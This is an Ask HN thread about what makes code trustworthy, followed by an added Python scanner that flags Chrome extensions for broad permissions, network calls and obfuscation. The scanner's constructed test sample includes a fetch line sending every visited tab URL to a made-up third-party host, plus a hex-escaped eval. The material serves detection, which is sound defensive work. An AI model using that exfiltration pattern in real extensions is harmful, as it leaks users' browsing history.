
Ask HN: What makes you trust a codebase? - megous
I sometimes find it hard to trust other people's code. For example, recently I wanted to know how the configuration file affects request processing in nginx. That was no fun at all. Software engineers trust nginx and deploy it a lot, yet they probably wouldn't be able to chart out the internal structure of it off the cuff.

It is said that many eyeballs eyeballing the code over time makes it more trustworthy. But what do these eyeballs look for that inspires trust?

(I'm not meaning to single out nginx, it was just at the top of my mind as an example.)
======
chatmasta
Depends on the type of project. For something as big as nginx, unless you're a
professional source code auditor with a lot of time, you pretty much need to
rely on the "many eyeballs eyeballing the code." If big companies are using
the product in production, you can bet many edge cases have been tested, bugs
found and resolved.

For smaller stuff, what comes to mind is chrome extensions. Whenever I install
some sketchy looking chrome extension like "user agent switcher" that requests
permission to work on every URL, I always check the source code of the
extension for any code that might exfiltrate data to external sources. Usually
the source code is minimal and this only takes a few minutes. I do a quick
scan for any code that is suspiciously obfuscated or seems to make an
XMLHttpRequest to a sketchy site, and if I see anything like that I "nope" right
out of there.

It also comes down to what your threat model is and what you're trying to
protect yourself from. If you know that, then you have an idea of what
specifically to look for.
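The "few minutes" scan described in the comment above is easy to turn into a script. The following is an added example, not code from the commenter or from any real extension: it reads an unpacked extension's manifest.json for broad host permissions, then greps the JavaScript for network sinks (fetch, XMLHttpRequest, sendBeacon, WebSocket), hard-coded remote hosts, dynamic-code entry points (eval, Function, atob) and runs of `\x` escapes, which is how obfuscated strings usually look. Both sample extensions (UA_SWITCHER and TELEMETRY_SWITCHER) and the host stats.example.net are constructed for the example. The regexes are heuristics, not a JavaScript parser; the output is a list of lines to read by hand, not a verdict you should act on blindly.

```python
import json
import re

# Heuristic patterns: cheap to run, easy to evade, but they surface the lines
# a human reviewer wants to read first.
NETWORK_SINKS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket|importScripts)\b")
URL_LITERAL = re.compile(r"https?://[A-Za-z0-9.\-]+")
DYNAMIC_CODE = re.compile(r"\b(eval|Function|atob|unescape)\s*\(")
HEX_ESCAPES = re.compile(r"(\\x[0-9a-fA-F]{2}){4,}")  # four or more \xNN in a row
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def broad_host_permissions(manifest):
    """Return the declared permission strings that grant access to every site."""
    declared = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    return sorted(p for p in declared if p in BROAD_HOSTS)


def scan_js(name, source):
    """Return (file, line, kind, match) tuples for every suspicious line in one script."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in NETWORK_SINKS.finditer(line):
            findings.append((name, lineno, "network-sink", m.group(0)))
        for m in URL_LITERAL.finditer(line):
            findings.append((name, lineno, "remote-host", m.group(0)))
        for m in DYNAMIC_CODE.finditer(line):
            findings.append((name, lineno, "dynamic-code", m.group(1)))
        if HEX_ESCAPES.search(line):
            findings.append((name, lineno, "obfuscation", "run of \\x escapes"))
    return findings


def scan_extension(files):
    """files maps a path inside the unpacked extension to its text content."""
    manifest = json.loads(files["manifest.json"])
    findings = []
    for name, content in files.items():
        if name.endswith(".js"):
            findings.extend(scan_js(name, content))
    broad = broad_host_permissions(manifest)
    kinds = {kind for _, _, kind, _ in findings}
    # "nope": runs on every site and talks to a remote host or hides what it does.
    # "review": worth reading, either because of broad access or because it makes requests.
    if broad and kinds & {"remote-host", "obfuscation", "dynamic-code"}:
        verdict = "nope"
    elif broad or "network-sink" in kinds:
        verdict = "review"
    else:
        verdict = "ok"
    return {"broad_hosts": broad, "findings": findings, "verdict": verdict}


# Constructed sample 1: a user-agent switcher that needs <all_urls> but makes no requests.
UA_SWITCHER = {
    "manifest.json": json.dumps({
        "name": "UA Switcher", "manifest_version": 2, "version": "1.0",
        "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"],
        "background": {"scripts": ["background.js"]},
    }),
    "background.js": r'''// rewrite the User-Agent header on outgoing requests
chrome.webRequest.onBeforeSendHeaders.addListener(function (details) {
  var headers = details.requestHeaders.filter(function (h) {
    return h.name.toLowerCase() !== "user-agent";
  });
  headers.push({ name: "User-Agent", value: "Mozilla/5.0 (X11; Linux x86_64)" });
  return { requestHeaders: headers };
}, { urls: ["<all_urls>"] }, ["blocking", "requestHeaders"]);
''',
}

# Constructed sample 2: same permissions, plus a line that ships every visited URL
# to a third-party host (stats.example.net is made up) and an obfuscated eval.
TELEMETRY_SWITCHER = {
    "manifest.json": UA_SWITCHER["manifest.json"],
    "background.js": r'''// "usage statistics"
chrome.tabs.onUpdated.addListener(function (id, info, tab) {
  fetch("https://stats.example.net/c?p=" + btoa(tab.url));
  eval("\x73\x65\x74\x54\x69\x6d\x65\x6f\x75\x74(0)");
});
''',
}

if __name__ == "__main__":
    for label, ext in (("ua-switcher", UA_SWITCHER), ("telemetry-switcher", TELEMETRY_SWITCHER)):
        report = scan_extension(ext)
        print(label, report["verdict"], report["broad_hosts"])
        for name, lineno, kind, match in report["findings"]:
            print(f"  {name}:{lineno} {kind}: {match}")
```

To run it against a real extension, read each file from the unpacked directory (Chrome keeps installed extensions under the profile's Extensions folder) into the same path-to-text mapping. The benign switcher comes back as "review", which matches the comment: broad access alone is a reason to read the code, not to reject it; the telemetry variant comes back as "nope" because the one fetch line and the hex-escaped eval are exactly what the scan is for.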

